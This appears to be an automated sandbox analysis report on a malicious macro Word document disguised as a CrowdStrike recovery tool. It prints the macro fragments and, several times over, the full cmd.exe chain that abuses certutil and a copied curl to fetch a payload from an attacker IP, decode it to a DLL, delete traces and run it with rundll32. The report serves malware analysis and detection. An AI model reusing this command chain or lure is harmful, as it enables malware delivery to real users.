Source: VBA code instrumentationOLE, VBA macro: Module ThisDocument, Function MainFunc, String rundll32: pp = pp + "START " + vbDblQuote + " " + vbDblQuote + " rundll32 " + mal_dec_exe_path + ",DllMain" + " & "
Source: VBA code instrumentationOLE, VBA macro: Module ThisDocument, Function MainFunc, String wscript: Set objShell = CreateObject("WScript.Shell")
Source: ~WRC0001.tmp.16.drOLE, VBA macro line: pp = pp + "tem32\cmd.exe /c "
Source: ~WRC0001.tmp.16.drOLE, VBA macro line: pp = pp + "START " + vbDblQuote + " " + vbDblQuote + " rundll32 " + mal_dec_exe_path + ",DllMain" + " & "
Source: C:\Program Files (x86)\Google\Chrome\Application\chrome.exeFile dump: C:\Users\user\Downloads\MsftRecoveryToolForCSv2.zip (copy)Jump to dropped file
Source: C:\Windows\System32\certutil.exeFile created: C:\Windows\cer6529.tmpJump to behavior
Source: C:\Windows\System32\certutil.exeFile created: C:\Windows\cer6690.tmpJump to behavior
Source: C:\Windows\System32\certutil.exeFile created: C:\Windows\cer7050.tmpJump to behavior
Source: C:\Windows\System32\certutil.exeFile created: C:\Windows\cer601A.tmpJump to behavior
Source: C:\Windows\System32\certutil.exeFile created: C:\Windows\cer60A7.tmpJump to behavior
Source: C:\Windows\System32\certutil.exeFile created: C:\Windows\cer6873.tmpJump to behavior
Source: C:\Windows\System32\certutil.exeFile deleted: C:\Windows\cer6529.tmpJump to behavior
Source: C:\Users\user\AppData\Local\Temp\curl.exeCode function: 7_2_000000013F490F28
Source: C:\Users\user\AppData\Local\Temp\curl.exeCode function: 7_2_000000013F499B60
Source: C:\Users\user\AppData\Local\Temp\curl.exeCode function: 7_2_000000013F4B1B00
Source: C:\Users\user\AppData\Local\Temp\curl.exeCode function: 7_2_000000013F497BAC
Source: C:\Users\user\AppData\Local\Temp\curl.exeCode function: 7_2_000000013F4BCBDC
Source: C:\Users\user\AppData\Local\Temp\curl.exeCode function: 7_2_000000013F490658
Source: C:\Users\user\AppData\Local\Temp\curl.exeCode function: 7_2_000000013F481AB0
Source: C:\Users\user\AppData\Local\Temp\curl.exeCode function: 7_2_000000013F4AE4F0
Source: C:\Users\user\AppData\Local\Temp\curl.exeCode function: 7_2_000000013F48A9B4
Source: C:\Users\user\AppData\Local\Temp\curl.exeCode function: 7_2_000000013F4A49D0
Source: C:\Users\user\AppData\Local\Temp\curl.exeCode function: 7_2_000000013F4AADC8
Source: C:\Users\user\AppData\Local\Temp\curl.exeCode function: 7_2_000000013F49BDE0
Source: C:\Users\user\AppData\Local\Temp\curl.exeCode function: 7_2_000000013F49B840
Source: C:\Users\user\AppData\Local\Temp\curl.exeCode function: 7_2_000000013F484860
Source: C:\Users\user\AppData\Local\Temp\curl.exeCode function: 7_2_000000013F49F458
Source: C:\Users\user\AppData\Local\Temp\curl.exeCode function: 7_2_000000013F4C0804
Source: C:\Users\user\AppData\Local\Temp\curl.exeCode function: 7_2_000000013F4944A4
Source: C:\Users\user\AppData\Local\Temp\curl.exeCode function: 7_2_000000013F4A88D8
Source: C:\Users\user\AppData\Local\Temp\curl.exeCode function: 7_2_000000013F490C74
Source: C:\Users\user\AppData\Local\Temp\curl.exeCode function: 7_2_000000013F4B2C88
Source: C:\Users\user\AppData\Local\Temp\curl.exeCode function: 7_2_000000013F4A7888
Source: C:\Users\user\AppData\Local\Temp\curl.exeCode function: 22_2_000000013F331B00
Source: C:\Users\user\AppData\Local\Temp\curl.exeCode function: 22_2_000000013F319B60
Source: C:\Users\user\AppData\Local\Temp\curl.exeCode function: 22_2_000000013F310F28
Source: C:\Users\user\AppData\Local\Temp\curl.exeCode function: 22_2_000000013F33CBDC
Source: C:\Users\user\AppData\Local\Temp\curl.exeCode function: 22_2_000000013F317BAC
Source: C:\Users\user\AppData\Local\Temp\curl.exeCode function: 22_2_000000013F310658
Source: C:\Users\user\AppData\Local\Temp\curl.exeCode function: 22_2_000000013F301AB0
Source: C:\Users\user\AppData\Local\Temp\curl.exeCode function: 22_2_000000013F32E4F0
Source: C:\Users\user\AppData\Local\Temp\curl.exeCode function: 22_2_000000013F31BDE0
Source: C:\Users\user\AppData\Local\Temp\curl.exeCode function: 22_2_000000013F32ADC8
Source: C:\Users\user\AppData\Local\Temp\curl.exeCode function: 22_2_000000013F3249D0
Source: C:\Users\user\AppData\Local\Temp\curl.exeCode function: 22_2_000000013F30A9B4
Source: C:\Users\user\AppData\Local\Temp\curl.exeCode function: 22_2_000000013F340804
Source: C:\Users\user\AppData\Local\Temp\curl.exeCode function: 22_2_000000013F31F458
Source: C:\Users\user\AppData\Local\Temp\curl.exeCode function: 22_2_000000013F304860
Source: C:\Users\user\AppData\Local\Temp\curl.exeCode function: 22_2_000000013F31B840
Source: C:\Users\user\AppData\Local\Temp\curl.exeCode function: 22_2_000000013F332C88
Source: C:\Users\user\AppData\Local\Temp\curl.exeCode function: 22_2_000000013F327888
Source: C:\Users\user\AppData\Local\Temp\curl.exeCode function: 22_2_000000013F310C74
Source: C:\Users\user\AppData\Local\Temp\curl.exeCode function: 22_2_000000013F3288D8
Source: C:\Users\user\AppData\Local\Temp\curl.exeCode function: 22_2_000000013F3144A4
Source: New_Recovery_Tool_to_help_with_CrowdStrike_issue_impacting_Windows.docmOLE, VBA macro line: Sub Document_Open()
Source: VBA code instrumentationOLE, VBA macro: Module ThisDocument, Function Document_Open
Source: ~WRC0001.tmp.16.drOLE, VBA macro line: Sub Document_Open()
Source: New_Recovery_Tool_to_help_with_CrowdStrike_issue_impacting_Windows.docmOLE indicator, VBA macros: true
Source: ~WRC0001.tmp.16.drOLE indicator, VBA macros: true
Source: New_Recovery_Tool_to_help_with_CrowdStrike_issue_impacting_Windows.docmStream path 'VBA/__SRP_0' : http://172.104.160.126:8099\curl.txt\curl.exe/payload2.txt\mscorsvc.txt\mscorsvc.dllC:\Windows\Sys"tem32\cmd.exe /c$-encode$\cu-decode"$ -o$del&rl.exe &.bq.aSTART( rundll32&,DllMainexit
Source: ~WRF{3AA38F7F-7D95-4F50-A501-E291FEC70BAA}.tmp.0.drOLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
Source: C:\Users\user\AppData\Local\Temp\curl.exeCode function: String function: 000000013F48A780 appears 49 times
Source: C:\Users\user\AppData\Local\Temp\curl.exeCode function: String function: 000000013F495658 appears 44 times
Source: C:\Users\user\AppData\Local\Temp\curl.exeCode function: String function: 000000013F321F00 appears 134 times
Source: C:\Users\user\AppData\Local\Temp\curl.exeCode function: String function: 000000013F321FA0 appears 107 times
Source: C:\Users\user\AppData\Local\Temp\curl.exeCode function: String function: 000000013F4A1FA0 appears 107 times
Source: C:\Users\user\AppData\Local\Temp\curl.exeCode function: String function: 000000013F314FC8 appears 90 times
Source: C:\Users\user\AppData\Local\Temp\curl.exeCode function: String function: 000000013F315658 appears 44 times
Source: C:\Users\user\AppData\Local\Temp\curl.exeCode function: String function: 000000013F30A780 appears 49 times
Source: C:\Users\user\AppData\Local\Temp\curl.exeCode function: String function: 000000013F494FC8 appears 90 times
Source: C:\Users\user\AppData\Local\Temp\curl.exeCode function: String function: 000000013F4A1F00 appears 134 times
Source: classification engineClassification label: mal88.expl.evad.winDOCM@51/26@4/3
Source: C:\Users\user\AppData\Local\Temp\curl.exeCode function: 7_2_000000013F483434 CreateToolhelp32Snapshot,GetLastError,CloseHandle,Module32First,Module32Next,
Source: C:\Program Files (x86)\Google\Chrome\Application\chrome.exeFile created: C:\Program Files\GoogleJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\Desktop\~$w_Recovery_Tool_to_help_with_CrowdStrike_issue_impacting_Windows.docmJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Temp\CVRAC07.tmpJump to behavior
Source: New_Recovery_Tool_to_help_with_CrowdStrike_issue_impacting_Windows.docmOLE indicator, Word Document stream: true
Source: ~WRC0001.tmp.16.drOLE indicator, Word Document stream: true
Source: ~WRC0000.tmp.16.drOLE indicator, Word Document stream: true
Source: New_Recovery_Tool_to_help_with_CrowdStrike_issue_impacting_Windows.docmOLE document summary: title field not present or empty
Source: ~WRF{3AA38F7F-7D95-4F50-A501-E291FEC70BAA}.tmp.0.drOLE document summary: title field not present or empty
Source: ~WRF{3AA38F7F-7D95-4F50-A501-E291FEC70BAA}.tmp.0.drOLE document summary: author field not present or empty
Source: ~WRF{3AA38F7F-7D95-4F50-A501-E291FEC70BAA}.tmp.0.drOLE document summary: edited time not present or 0
Source: ~WRC0001.tmp.16.drOLE document summary: title field not present or empty
Source: C:\Windows\System32\cmd.exeConsole Write: ..................aJ....................................@ceJ..... ..............t........8Mw....f.......................v........v#.............
Source: C:\Windows\System32\cmd.exeConsole Write: ..................aJ....................................@ceJ..... ......@.......(x#.....q8Mw............................~........w#.............
Source: C:\Windows\System32\certutil.exeConsole Write: ................................I.n.p.u.t. .L.e.n.g.t.h. .=. .5.3.0.9.4.4...............#........d......................*.......q(2w............
Source: C:\Windows\System32\certutil.exeConsole Write: ........................................(.P.....................H.......<...............#........d..............................................
Source: C:\Windows\System32\certutil.exeConsole Write: ................................O.u.t.p.u.t. .L.e.n.g.t.h. .=. .7.3.0.1.0.8.............#........d......................,.......................
Source: C:\Windows\System32\certutil.exeConsole Write: ........................................(.P.............................................#........d..............................................
Source: C:\Windows\System32\certutil.exeConsole Write: ..!.............................p.......(.P.............................................#........3)...............!.....b.......................
Source: C:\Windows\System32\certutil.exeConsole Write: ........................................(.P.............................................#........3)...............................!.............
Source: C:\Windows\System32\certutil.exeConsole Write: ................................I.n.p.u.t. .L.e.n.g.t.h. .=. .7.3.0.1.0.8...............#.......(dA............... .....*.......q(2w...... .....
Source: C:\Windows\System32\certutil.exeConsole Write: .................................. .....(.P.............................D...............#.......(dA............... ....................... .....
Source: C:\Windows\System32\certutil.exeConsole Write: ................................O.u.t.p.u.t. .L.e.n.g.t.h. .=. .5.3.0.9.4.4.............#.......(dA............... .....,................. .....
Source: C:\Windows\System32\certutil.exeConsole Write: .................................. .....(.P.............................\...............#.......(dA............... ....................... .....
Source: C:\Windows\System32\certutil.exeConsole Write: ..!............................... .....(.P.............................`...............#........3)...............!.....b.........2....... .....
Source: C:\Windows\System32\certutil.exeConsole Write: .................................. .....(.P.............................d...............#........3).............(. ...............!....... .....
Source: C:\Windows\System32\certutil.exeConsole Write: ..!..............Q.w....................(.P.....................D.......................#.......(d................!.............q(2w............
Source: C:\Windows\System32\certutil.exeConsole Write: .................Q.w....................(.P.....................D.......................#.......(d..............H.................!.............
Source: C:\Windows\System32\certutil.exeConsole Write: ..!.............x.6.....................(.P.....................D.......................#.........6...............!.....n... .r.e.t.u.r.........
Source: C:\Windows\System32\certutil.exeConsole Write: ................x.6.....................(.P.....................D.......................#.........6.............h........... .r...!.............
Source: C:\Windows\System32\certutil.exeConsole Write: ..!..............Q.w....................(.P.............................................#.......p.$...............!.....j.......................
Source: C:\Windows\System32\cmd.exeConsole Write: ..................aJ....................................@ceJ..... ......P.(......^I.......uw......E.......(.............v........]I.............
Source: C:\Windows\System32\cmd.exeConsole Write: ..................aJ....................................@ceJ..... ........(......`I.......uw......E..... .(.............~........^I.............
Source: C:\Windows\System32\certutil.exeConsole Write: ................................I.n.p.u.t. .L.e.n.g.t.h. .=. .5.3.0.9.4.4...............#........d..............H.(.....*.......q(2w......(.....
Source: C:\Windows\System32\certutil.exeConsole Write: ..................................(.....(.P.....(.......................7{..............#........d..............H.(.......................(.....
Source: C:\Windows\System32\certutil.exeConsole Write: ................................O.u.t.p.u.t. .L.e.n.g.t.h. .=. .7.3.0.1.0.8.............#........d..............H.(.....,.................(.....
Source: C:\Windows\System32\certutil.exeConsole Write: ..................................(.....(.P.....(........................{..............#........d..............H.(.......................(.....
Source: C:\Windows\System32\certutil.exeConsole Write: ................................ .(.....(.P.....(........................{..............#........3).....................b.........x.......(.....
Source: C:\Windows\System32\certutil.exeConsole Write: ..................................(.....(.P.....(........................{..............#........3)...............(.......................(.....
Source: C:\Windows\System32\certutil.exeConsole Write: ................................I.n.p.u.t. .L.e.n.g.t.h. .=. .7.3.0.1.0.8...............#.......(dF.....................*.......q(2w............
Source: C:\Windows\System32\certutil.exeConsole Write: ........................................(.P.....(........................|..............#.......(dF.............................................
Source: C:\Windows\System32\certutil.exeConsole Write: ................................O.u.t.p.u.t. .L.e.n.g.t.h. .=. .5.3.0.9.4.4.............#.......(dF.....................,.......................
Source: C:\Windows\System32\certutil.exeConsole Write: ........................................(.P.....(.......................'|..............#.......(dF.............................................
Source: C:\Windows\System32\certutil.exeConsole Write: ................................p.......(.P.....(.......................+|..............#........3).....................b.........7.............
Source: C:\Windows\System32\certutil.exeConsole Write: ........................................(.P.....(......................./|..............#........3).............................................
Source: C:\Windows\System32\certutil.exeConsole Write: .................Q.w............ .......(.P.....(.......................v~..............#.......(d..............................q(2w............
Source: C:\Windows\System32\certutil.exeConsole Write: .................Q.w....................(.P.....(.......................z~..............#.......(d..............................................
Source: C:\Windows\System32\certutil.exeConsole Write: ................x.#.............@.......(.P.....(.......................~~..............#.........#.....................n... .r.e.t.u.r.........
Source: C:\Windows\System32\certutil.exeConsole Write: ................x.#.....................(.P.....(........................~..............#.........#......................... .r.................
Source: C:\Windows\System32\certutil.exeConsole Write: .................Q.w....................(.P.....(........................~..............#.......p.$.....................j.......................
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile read: C:\Users\desktop.iniJump to behavior
Source: C:\Windows\System32\xcopy.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\rundll32.exe rundll32 C:\Users\user\AppData\Local\Temp\mscorsvc.dll,DllMain
Source: New_Recovery_Tool_to_help_with_CrowdStrike_issue_impacting_Windows.docmReversingLabs: Detection: 26%
Source: curl.exeString found in binary or memory: This is not the full help, this menu is stripped into categories. Use "--help category" to get an overview of all categories. For all options use the manual or "--help all".
Source: curl.exeString found in binary or memory: This is not the full help, this menu is stripped into categories. Use "--help category" to get an overview of all categories. For all options use the manual or "--help all".
Source: curl.exeString found in binary or memory: curl: try 'curl --help' for more information
Source: curl.exeString found in binary or memory: curl: try 'curl --help' for more information
Source: curl.exeString found in binary or memory: curl: try 'curl --help' for more information
Source: curl.exeString found in binary or memory: curl: try 'curl --help' for more information
Source: curl.exeString found in binary or memory: This is not the full help, this menu is stripped into categories.Use "--help category" to get an overview of all categories.For all options use the manual or "--help all".
Source: curl.exeString found in binary or memory: This is not the full help, this menu is stripped into categories.Use "--help category" to get an overview of all categories.For all options use the manual or "--help all".
Source: curl.exeString found in binary or memory: This is not the full help, this menu is stripped into categories. Use "--help category" to get an overview of all categories. For all options use the manual or "--help all".
Source: curl.exeString found in binary or memory: This is not the full help, this menu is stripped into categories. Use "--help category" to get an overview of all categories. For all options use the manual or "--help all".
Source: curl.exeString found in binary or memory: curl: try 'curl --help' for more information
Source: curl.exeString found in binary or memory: curl: try 'curl --help' for more information
Source: curl.exeString found in binary or memory: curl: try 'curl --help' for more information
Source: curl.exeString found in binary or memory: curl: try 'curl --help' for more information
Source: curl.exeString found in binary or memory: This is not the full help, this menu is stripped into categories.Use "--help category" to get an overview of all categories.For all options use the manual or "--help all".
Source: curl.exeString found in binary or memory: This is not the full help, this menu is stripped into categories.Use "--help category" to get an overview of all categories.For all options use the manual or "--help all".
Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c xcopy C:\Windows\System32\curl.exe C:\Users\user\AppData\Local\Temp & certutil -f -encode C:\Users\user\AppData\Local\Temp\curl.exe C:\Users\user\AppData\Local\Temp\curl.txt & certutil -f -decode C:\Users\user\AppData\Local\Temp\curl.txt C:\Users\user\AppData\Local\Temp\curl.exe & C:\Users\user\AppData\Local\Temp\curl.exe http://172.104.160.126:8099/payload2.txt -o C:\Users\user\AppData\Local\Temp\mscorsvc.txt & certutil -f -decode C:\Users\user\AppData\Local\Temp\mscorsvc.txt C:\Users\user\AppData\Local\Temp\mscorsvc.dll & del C:\Users\user\AppData\Local\Temp\curl.exe & del C:\Users\user\AppData\Local\Temp\curl.txt & del C:\Users\user\AppData\Local\Temp\curl.exe & del C:\Users\user\AppData\Local\Temp\mscorsvc.txt & START " " rundll32 C:\Users\user\AppData\Local\Temp\mscorsvc.dll,DllMain & exit
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\xcopy.exe xcopy C:\Windows\System32\curl.exe C:\Users\user\AppData\Local\Temp
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\certutil.exe certutil -f -encode C:\Users\user\AppData\Local\Temp\curl.exe C:\Users\user\AppData\Local\Temp\curl.txt
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\certutil.exe certutil -f -decode C:\Users\user\AppData\Local\Temp\curl.txt C:\Users\user\AppData\Local\Temp\curl.exe
Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\curl.exe C:\Users\user\AppData\Local\Temp\curl.exe http://172.104.160.126:8099/payload2.txt -o C:\Users\user\AppData\Local\Temp\mscorsvc.txt
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\certutil.exe certutil -f -decode C:\Users\user\AppData\Local\Temp\mscorsvc.txt C:\Users\user\AppData\Local\Temp\mscorsvc.dll
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\rundll32.exe rundll32 C:\Users\user\AppData\Local\Temp\mscorsvc.dll,DllMain
Source: unknownProcess created: C:\Program Files (x86)\Google\Chrome\Application\chrome.exe "C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
Source: C:\Program Files (x86)\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files (x86)\Google\Chrome\Application\chrome.exe "C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1352 --field-trial-handle=1336,i,10461182675022210413,3013190625299692533,131072 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: unknownProcess created: C:\Program Files (x86)\Google\Chrome\Application\chrome.exe "C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" "https://go.microsoft.com/fwlink/?linkid=2280386"
Source: C:\Program Files (x86)\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files (x86)\Google\Chrome\Application\chrome.exe "C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.FileUtilService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=2208 --field-trial-handle=1336,i,10461182675022210413,3013190625299692533,131072 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c xcopy C:\Windows\System32\curl.exe C:\Users\user\AppData\Local\Temp & certutil -f -encode C:\Users\user\AppData\Local\Temp\curl.exe C:\Users\user\AppData\Local\Temp\curl.txt & certutil -f -decode C:\Users\user\AppData\Local\Temp\curl.txt C:\Users\user\AppData\Local\Temp\curl.exe & C:\Users\user\AppData\Local\Temp\curl.exe http://172.104.160.126:8099/payload2.txt -o C:\Users\user\AppData\Local\Temp\mscorsvc.txt & certutil -f -decode C:\Users\user\AppData\Local\Temp\mscorsvc.txt C:\Users\user\AppData\Local\Temp\mscorsvc.dll & del C:\Users\user\AppData\Local\Temp\curl.exe & del C:\Users\user\AppData\Local\Temp\curl.txt & del C:\Users\user\AppData\Local\Temp\curl.exe & del C:\Users\user\AppData\Local\Temp\mscorsvc.txt & START " " rundll32 C:\Users\user\AppData\Local\Temp\mscorsvc.dll,DllMain & exit
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\xcopy.exe xcopy C:\Windows\System32\curl.exe C:\Users\user\AppData\Local\Temp
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\certutil.exe certutil -f -encode C:\Users\user\AppData\Local\Temp\curl.exe C:\Users\user\AppData\Local\Temp\curl.txt
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\certutil.exe certutil -f -decode C:\Users\user\AppData\Local\Temp\curl.txt C:\Users\user\AppData\Local\Temp\curl.exe
Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\curl.exe C:\Users\user\AppData\Local\Temp\curl.exe http://172.104.160.126:8099/payload2.txt -o C:\Users\user\AppData\Local\Temp\mscorsvc.txt
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\certutil.exe certutil -f -decode C:\Users\user\AppData\Local\Temp\mscorsvc.txt C:\Users\user\AppData\Local\Temp\mscorsvc.dll
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\rundll32.exe rundll32 C:\Users\user\AppData\Local\Temp\mscorsvc.dll,DllMain
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c xcopy C:\Windows\System32\curl.exe C:\Users\user\AppData\Local\Temp & certutil -f -encode C:\Users\user\AppData\Local\Temp\curl.exe C:\Users\user\AppData\Local\Temp\curl.txt & certutil -f -decode C:\Users\user\AppData\Local\Temp\curl.txt C:\Users\user\AppData\Local\Temp\curl.exe & C:\Users\user\AppData\Local\Temp\curl.exe http://172.104.160.126:8099/payload2.txt -o C:\Users\user\AppData\Local\Temp\mscorsvc.txt & certutil -f -decode C:\Users\user\AppData\Local\Temp\mscorsvc.txt C:\Users\user\AppData\Local\Temp\mscorsvc.dll & del C:\Users\user\AppData\Local\Temp\curl.exe & del C:\Users\user\AppData\Local\Temp\curl.txt & del C:\Users\user\AppData\Local\Temp\curl.exe & del C:\Users\user\AppData\Local\Temp\mscorsvc.txt & START " " rundll32 C:\Users\user\AppData\Local\Temp\mscorsvc.dll,DllMain & exit
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\xcopy.exe xcopy C:\Windows\System32\curl.exe C:\Users\user\AppData\Local\Temp
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\certutil.exe certutil -f -encode C:\Users\user\AppData\Local\Temp\curl.exe C:\Users\user\AppData\Local\Temp\curl.txt
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\certutil.exe certutil -f -decode C:\Users\user\AppData\Local\Temp\curl.txt C:\Users\user\AppData\Local\Temp\curl.exe
Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\curl.exe C:\Users\user\AppData\Local\Temp\curl.exe http://172.104.160.126:8099/payload2.txt -o C:\Users\user\AppData\Local\Temp\mscorsvc.txt
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\certutil.exe certutil -f -decode C:\Users\user\AppData\Local\Temp\mscorsvc.txt C:\Users\user\AppData\Local\Temp\mscorsvc.dll
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\rundll32.exe rundll32 C:\Users\user\AppData\Local\Temp\mscorsvc.dll,DllMain
Source: C:\Program Files (x86)\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files (x86)\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files (x86)\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files (x86)\Google\Chrome\Application\chrome.exe "C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1352 --field-trial-handle=1336,i,10461182675022210413,3013190625299692533,131072 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: C:\Program Files (x86)\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files (x86)\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files (x86)\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files (x86)\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files (x86)\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files (x86)\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files (x86)\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files (x86)\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files (x86)\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files (x86)\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files (x86)\Google\Chrome\Application\chrome.exe "C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.FileUtilService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=2208 --field-trial-handle=1336,i,10461182675022210413,3013190625299692533,131072 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: C:\Program Files (x86)\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files (x86)\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files (x86)\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files (x86)\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c xcopy C:\Windows\System32\curl.exe C:\Users\user\AppData\Local\Temp & certutil -f -encode C:\Users\user\AppData\Local\Temp\curl.exe C:\Users\user\AppData\Local\Temp\curl.txt & certutil -f -decode C:\Users\user\AppData\Local\Temp\curl.txt C:\Users\user\AppData\Local\Temp\curl.exe & C:\Users\user\AppData\Local\Temp\curl.exe http://172.104.160.126:8099/payload2.txt -o C:\Users\user\AppData\Local\Temp\mscorsvc.txt & certutil -f -decode C:\Users\user\AppData\Local\Temp\mscorsvc.txt C:\Users\user\AppData\Local\Temp\mscorsvc.dll & del C:\Users\user\AppData\Local\Temp\curl.exe & del C:\Users\user\AppData\Local\Temp\curl.txt & del C:\Users\user\AppData\Local\Temp\curl.exe & del C:\Users\user\AppData\Local\Temp\mscorsvc.txt & START " " rundll32 C:\Users\user\AppData\Local\Temp\mscorsvc.dll,DllMain & exit
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\xcopy.exe xcopy C:\Windows\System32\curl.exe C:\Users\user\AppData\Local\Temp
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\certutil.exe certutil -f -encode C:\Users\user\AppData\Local\Temp\curl.exe C:\Users\user\AppData\Local\Temp\curl.txt
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\certutil.exe certutil -f -decode C:\Users\user\AppData\Local\Temp\curl.txt C:\Users\user\AppData\Local\Temp\curl.exe
Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\curl.exe C:\Users\user\AppData\Local\Temp\curl.exe http://172.104.160.126:8099/payload2.txt -o C:\Users\user\AppData\Local\Temp\mscorsvc.txt
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\certutil.exe certutil -f -decode C:\Users\user\AppData\Local\Temp\mscorsvc.txt C:\Users\user\AppData\Local\Temp\mscorsvc.dll
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\rundll32.exe rundll32 C:\Users\user\AppData\Local\Temp\mscorsvc.dll,DllMain
Source: C:\Windows\System32\cmd.exeSection loaded: winbrand.dll
Source: C:\Windows\System32\xcopy.exeSection loaded: ulib.dll
Source: C:\Windows\System32\xcopy.exeSection loaded: ifsutil.dll
Source: C:\Windows\System32\certutil.exeSection loaded: certcli.dll
Source: C:\Windows\System32\certutil.exeSection loaded: atl.dll
Source: C:\Windows\System32\certutil.exeSection loaded: cabinet.dll
Source: C:\Windows\System32\certutil.exeSection loaded: cryptui.dll
Source: C:\Windows\System32\certutil.exeSection loaded: ncrypt.dll
Source: C:\Windows\System32\certutil.exeSection loaded: bcrypt.dll
Source: C:\Windows\System32\certutil.exeSection loaded: netapi32.dll
Source: C:\Windows\System32\certutil.exeSection loaded: netutils.dll
Source: C:\Windows\System32\certutil.exeSection loaded: srvcli.dll
Source: C:\Windows\System32\certutil.exeSection loaded: wkscli.dll
Source: C:\Windows\System32\certutil.exeSection loaded: logoncli.dll
Source: C:\Windows\System32\certutil.exeSection loaded: samcli.dll
Source: C:\Windows\System32\certutil.exeSection loaded: dsrole.dll
Source: C:\Windows\System32\certutil.exeSection loaded: ntdsapi.dll
Source: C:\Windows\System32\certutil.exeSection loaded: version.dll
Source: C:\Windows\System32\certutil.exeSection loaded: secur32.dll
Source: C:\Windows\System32\certutil.exeSection loaded: sspicli.dll
Source: C:\Windows\System32\certutil.exeSection loaded: dwmapi.dll
Source: C:\Windows\System32\certutil.exeSection loaded: cryptsp.dll
Source: C:\Windows\System32\certutil.exeSection loaded: cryptbase.dll
Source: C:\Windows\System32\certutil.exeSection loaded: certcli.dll
Source: C:\Windows\System32\certutil.exeSection loaded: atl.dll
